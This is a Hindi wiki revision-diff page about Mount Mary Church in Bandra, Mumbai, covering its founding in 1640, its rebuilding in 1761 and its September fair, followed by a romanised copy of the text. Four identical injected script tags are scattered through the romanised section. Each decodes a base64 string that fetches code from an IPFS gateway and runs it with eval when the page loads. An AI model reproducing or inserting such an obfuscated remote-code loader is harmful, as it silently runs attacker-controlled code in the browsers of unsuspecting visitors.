Difference between revisions of "माउंट मेरी चर्च मुंबई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " फ़िर " to " फिर ")
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 +
[[चित्र:Mount-Mary-Church-Mumbai.jpg|thumb|250px|माउंट मेरी चर्च, [[मुंबई]]<br />Mount Mary Church, Mumbai]]
 
*[[महाराष्ट्र]] के शहर [[मुंबई]] में कई [[मुम्बई पर्यटन|पर्यटन स्थल]] है जिनमें से एक माउंट मेरी चर्च है।
 
*[[महाराष्ट्र]] के शहर [[मुंबई]] में कई [[मुम्बई पर्यटन|पर्यटन स्थल]] है जिनमें से एक माउंट मेरी चर्च है।
 
*माउंट मेरी चर्च मुंबई शहर के [[बांद्रा]] में स्थित है।
 
*माउंट मेरी चर्च मुंबई शहर के [[बांद्रा]] में स्थित है।
 
*माउंट मैरी चर्च मुंबई शहर के विशिष्ट और भव्य चर्चों में से एक है।
 
*माउंट मैरी चर्च मुंबई शहर के विशिष्ट और भव्य चर्चों में से एक है।
 
*माउंट मैरी चर्च वर्जिन मेरी को समर्पित है।
 
*माउंट मैरी चर्च वर्जिन मेरी को समर्पित है।
*माउंट मैरी चर्च 1640 में बनाया गया था और फ़िर इसे गिरा दिया गया और 1761 में इसे दुबारा बनाया गया था.।
+
*माउंट मैरी चर्च 1640 में बनाया गया था और फिर इसे गिरा दिया गया और 1761 में इसे दुबारा बनाया गया था.।
 
*माउंट मैरी चर्च में [[सितम्बर]] माह के दौरान सप्ताह भर तक मेला लगता है।  
 
*माउंट मैरी चर्च में [[सितम्बर]] माह के दौरान सप्ताह भर तक मेला लगता है।  
 
*जिसमें हर [[धर्म]] के लोग इस मेले में शामिल होते हैं।  
 
*जिसमें हर [[धर्म]] के लोग इस मेले में शामिल होते हैं।  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
Line 16: Line 18:
 
{{महाराष्ट्र के पर्यटन स्थल}}
 
{{महाराष्ट्र के पर्यटन स्थल}}
 
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र_के_पर्यटन स्थल]][[Category:मुम्बई]]
 
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र_के_पर्यटन स्थल]][[Category:मुम्बई]]
 
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__
 +
[[Category:पर्यटन कोश]]
 +
[[Category:गिरजा घर]]
 +
[[Category:ईसाई धार्मिक स्थल]]

Latest revision as of 14:04, 1 August 2017

[[chitr:Mount-Mary-Church-Mumbai.jpg|thumb|250px|mauant meri charch, muanbee
Mount Mary Church, Mumbai]]

  • maharashtr ke shahar muanbee mean kee paryatan sthal hai jinamean se ek mauant meri charch hai.
  • mauant meri charch muanbee shahar ke baandra mean sthit hai.
  • mauant mairi charch muanbee shahar ke vishisht aur bhavy charchoan mean se ek hai.
  • mauant mairi charch varjin meri ko samarpit hai.
  • mauant mairi charch 1640 mean banaya gaya tha aur phir ise gira diya gaya aur 1761 mean ise dubara banaya gaya tha..
  • mauant mairi charch mean sitambar mah ke dauran saptah bhar tak mela lagata hai.
  • jisamean har dharm ke log is mele mean shamil hote haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>